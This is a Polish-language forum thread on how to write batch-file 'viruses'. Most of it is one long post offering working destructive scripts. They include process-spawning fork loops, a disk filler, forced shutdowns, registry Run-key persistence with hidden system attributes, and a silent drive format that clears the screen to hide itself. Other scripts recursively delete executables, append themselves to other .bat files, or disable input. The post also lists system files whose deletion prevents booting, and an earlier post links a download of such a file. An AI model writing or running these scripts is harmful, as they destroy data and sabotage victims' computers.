Skocz do zawartości

Jak zrobić wirusa *.bat


Jedi_Master2

Rekomendowane odpowiedzi

  • Odpowiedzi 101
  • Dodano
  • Ostatniej odpowiedzi

Top użytkownicy w tym temacie

Takiego wirusa można ulepszyć tak aby szybciej ten plik rosnął:

@echo off
echo hgecho jfgreigtfregfpk943orw409tr5it095iut05i9ut09ike0pioijtw09waurr9shdgsagaskgasggsag
dasgdshfkdkdyry7yi7yiidi7yridsrirhh4tr4tikr4ytiryiytgrdyhtikrdkghkrjfgreigtfregf
p
k943orw409tr5it095iut05i9ut09ike0pioijtw09waurr9shdgsagaskgasggsagdasgdshfkdkdyr
y
7yi7yiidi7yridsrirhh4tr4tikr4ytiryiytgrdyhtikrdkghkr >> C:\Windows\Temp\lol.txt
lol.bat

Do uploadera dam takiego zipa z tym ulepszonym (nie szkodliwym) wiruskiem

https://gmclan.org/up903_4_lol.html

Link do tego wiruska (Uwaga! rozmiar oryginalny pliku: 12.5mb!)

Odnośnik do komentarza
Udostępnij na innych stronach

  • 3 tygodnie później...

@Max: Jak już to ta funkcja nie usuwa katalogów ;P ale w gm tez mozna robic wirusy (najlepiej mieszajace w rejestrze xD) tylko po co? lepiej nie zabierac sie za cos co moze tworcy zniszczyc jego wlasnego kompa (przez pomylke oczywiscie xD)

Odnośnik do komentarza
Udostępnij na innych stronach

  • 14 lat później...

@echo off

:start

cls

color a

echo ZOSTALES ZCHAKOWANY

start notepad.exe

start notepad.exe

start notepad.exe

start notepad.exe

goto start

I TAK DALEJ, TO POWODUJE ŻE SYSTEM UMIERA 

Inaczej:

Polecenie:
-------------------
@echo off
start [link widoczny dla zalogowanych]
------------------
Powyższy programik otwiera nam stronę onet.pl można po start wpisać co chcemy np
start cos.bat otwiera plik cos.bat
start gg.exe otwiera komunikator gg
start [link widoczny dla zalogowanych] otwiera jakąś stronę www

A teraz coś do wkurzenia
----------------
@echo off
:start
start notepad.exe
start.cmd.exe
goto :start
-----------
Ten programik działa podobnie jak powszedni otwiera notatnik i wiersz polecenia
ale najlepsze w nim jest to :

@echo off
:start to jest tak jakby znacznikiem dla programu do których funkcji ma wrócić
start notepad.exe
start.cmd.exe
goto :start goto :start to jest tu najważniejsze gdy program otworzy notatnik i wiersz poleceń wraca to do
:start i znowu otwiera notatnik i wiersz poleceń i tak bez końca w minutę mamy otwartych ponad 600 procesów Smile
----------------------
shutdown.exe -s -t 600
----------------------
ta komenda zamyka nam system Windows po 10 minutach
-s oznacza wyłączenie komputera
-t mówi po jakim czasie ma być zamknięty komputer czas jest podawany w sekundach
zamiast -s możemy dać
-r restartuje komputer
-l wylogowuje użytkownika

teraz dodajmy to do autostartu żeby przy każdym uruchomieniu komp sie wyłączał
---------------
shutdown.exe -s -t 600

@echo off
copy %0 C:\wirus.bat
@echo REGEDIT4 >>a.reg
@echo. >>a.reg
@echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run] >>a.reg
@echo "win.sys"="C:\\wirus.bat" >>a.reg
@echo. >>a.reg
regedit /s a.reg
dir >nul
del a.reg >nul
i zapisujemy to jako wirus.bat tak jak podaliśmy. Dodany wpis do rejestru będzie uruchamiał
wirusa przy każdym włączeniu kompa

można zamknięcie systemu wyłączyć tą komendom :
---------------------
shutdown.exe -a
--------------------------
-------------------------
@echo off
echo T | format ? /q
cls
-------------------------------

to polecenie formatuje nam dysk ? w trybie szybkim i bez potwierdzenia
T | ( system pyta czy na pewno chcemy sformatować dysk C ten kawałek odpowiada za nas twierdząco
cls czyści ekran żeby użytkownik nie wiedział że coś sie Wogule usuwa
| ten znacznik tworzymy kombinacją klawiszy shift + \


Możemy nadać też naszemu wirusowi atrybuty systemowe
np nie Będzie widoczny nawet gdy mamy załączoną opcje
pokaż pliki ukryte
------------------------------------------
ATTRIB +S +H +R wirus.bat
-------------------------------------------
Atrybuty te możemy nadać każdemu plikowi wystarczy podać jego nazwę tak jak my podaliśmy nazwę naszego wirusa „wirus.bat”. Możemy je również zdjąć zamiast + wpiszmy - i zdejmiemy z określonego pliku atrybuty systemowe


Opóźnienie czasowe
możemy sprawić by jakaś komenda lub program uruchomiła się po konkretnym czasie

@echo off
PING -n 60 127.0.0.1 >nul
start cos.cos
po -n wpisujemy liczbę sekund tu jest np 60
po tym wpisujemy co ma sie uruchomić

tearaz jakiś wirusik
--------------------------------
@echo off
PING -n 2 127.0.0.1 >nul
start cmd.exe
start cmd.exe
PING -n 2 127.0.0.1 >nul
start cmd.exe
start cmd.exe
PING -n 2 127.0.0.1 >nul
start cmd.exe
start cmd.exe
PING -n 2 127.0.0.1 >nul
start cmd.exe
start cmd.exe
shutdown.exe -s -t 15

@echo off
copy %0 C:\wirus.bat
@echo REGEDIT4 >>a.reg
@echo. >>a.reg
@echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run] >>a.reg
@echo "win.sys"="C:\\wirus.bat" >>a.reg
@echo. >>a.reg
regedit /s a.reg
dir >nul
del a.reg >nul

ATTRIB +S +H +R +A wirus.bat

--------------------------------------


Ten wirus otwiera najpierw co 2 sekundy dwa razy wiersz polecenia
otworzy ich łącznie 8 po tym uruchamia wyłączenie kompa po 15 sekundach
dopisuje się do rejestru i nadaje sobie atrybuty pliku systemowego czyli użytkownik go nie widzi
--------------------
del *exe* /s /q
--------------------
usuwa wszystkie pliki exe w trybie szybkim można zamiast exe postawić kropkę wtedy usunie wszystkie pliki
w folderze w którym sie znajduje lub z dysku albo podać jakąś nazwę pliku np. dokument.txt i usunie tylko ten plik
Pamiętajcie ze del tutaj jest spacja *exe* tutaj jest spacja /s tutaj też jest spacja /q

---------------------------------------------------------------------------------------

@echo off
regedit /e ksyf
:start
cls
type ksyf >> c:windowssystem32syf.dll
goto start
-----------------------------------------------------------------------------------
ten bat zapełnia dysk

Mówią że wirusy bat nie potrafią się rozmnażać w jednym artykule o nich znalazłem coś co powinno was zaciekawić
--------------------------------------------------------------------
@echo off
ctty nul
for %%i in (*.bat) do copy %0+%%i %%i /y >nul
--------------------------------------------------------------------
To jest sposób na doklejanie się do innego pliku bat.

----------------------------
type %0 >>inny.bat

----------------------------
Zamazywanie innego pliku bat swoim kodem

Nie wiem czy te przykłady działają nie sprawdzałem ich na swoim komputerze.

Dałem tu listę ważnych plików systemowych po których usunięciu system się nie uruchomi

C:\COMMAND.COM
C:\IO.SYS
C:\MSDOS.SYS
C:\WINDOWS\WIN.COM
C:\WINDOWS\SYSTEM\VMM32\IOS.VXD
C:\WINDOWS\SYSTEM\VMM32.VXD
C:\WINDOWS\SYSTEM\KERNEL32.DLL
C:\WINDOWS\EXPLORER.EXE
C:\WINDOWS\SYSTEM\WINOA386.MOD
C:\WINDOWS\WIN.INI
C:\WINDOWS\SYSTEM.INI





a teraz na dokładkę kilka komend
uruchamiamy je w formacie
@echo off
start i tu komenda
(nie wszystkie działają w Windows XP)

user,exitwindows - zakończenie pracy Windows
user,wnetconnectdialog - okno dialogowe Mapuj Dysk Sieciowy
user,wnetdisconnectdialog - okno dialogowe Odłącz Dysk Sieciowy
user,disableoemlayer - wyłącza grafikę Windows (wygląda jak zawieszenie)
user,enableoemlayer - włącza grafikę Windows
user,repaintscreen - odświeża ekran [F5]
user,setcursorpos - kursor myszki leci w lewy-górny róg
user,tilechildwindows - ustawia okna w rzędzie
user,cascadechildwindows - odwrotność powyższego
user,swapmousebutton - zamienia klawisze myszki
user,setcareblinktime [n] - szybkość migania kursora
user,setdoubleckilcktime [n] - szybkość dwukliku
user.exe,MessageBeep - małe piknięcie
diskcopy,DiskCopyRunDLL - okno dialogowe Kopiuj Dysk
krnl386.exe,ExitKernel - zamknięcie sesji Kernela (bardzo szybkie zamknięcie systemu)
mouse,disable - blokada myszki
keyboard,disable - blokada klawiatury
shell,shellexecute - otwiera okno explorera
shell32,OpenAS_RunDLL - okno dialogowe Otwórz z ...
shell32,SHFormatDrive - okno dialogowe Formatuj
shell32,ShellAboutA - info o pamięci fizycznej i zasobach
shell32,SHexitWindowsEX 0 - wylogowanie z Windowsa (potwierdzenie)
shell32,SHexitWindowsEX 1 - zamyka Windows (potwierdzenie)
shell32,SHexitWindowsEX 2 - restartuje Windows
shell32,SHexitWindowsEX 3 - restartuje powloke Windows
shell32,Control_RunDLL - otwiera Panel Sterowania
shell32,Control_RunDLL desk.cpl - okno właściwości ekranu
shell32,Control_RunDLL main.cpl @0 - okno wlaściwości myszki
shell32,Control_RunDLL main.cpl @1 - okno wlaściwości klawiatury
shell32,Control_RunDLL main.cpl @3 - okno drukarek
shell32,Control_RunDLL powercfg.cpl - właściwości zarządzania energią
shell32,Control_RunDLL sysdm.cpl - okno właściwości systemu
shell32,Control_RunDLL datetime.cpl - okno ustawień daty i czasu
shell32,Control_RunDLL intl.cplv - okno ustawień regionalnych
shell32,Control_RunDLL joy.cpl - okno kontrolerów gry
shell32,Control_RunDLL sticpl.cpl - wlaściwości skanerów
shell32,Control_RunDLL findfast.cpl - okno Find Fastu

Odnośnik do komentarza
Udostępnij na innych stronach

Jeśli chcesz dodać odpowiedź, zaloguj się lub zarejestruj nowe konto

Jedynie zarejestrowani użytkownicy mogą komentować zawartość tej strony.

Zarejestruj nowe konto

Załóż nowe konto. To bardzo proste!

Zarejestruj się

Zaloguj się

Posiadasz już konto? Zaloguj się poniżej.

Zaloguj się
  • Ostatnio przeglądający   0 użytkowników

    • Brak zarejestrowanych użytkowników przeglądających tę stronę.

×
×
  • Dodaj nową pozycję...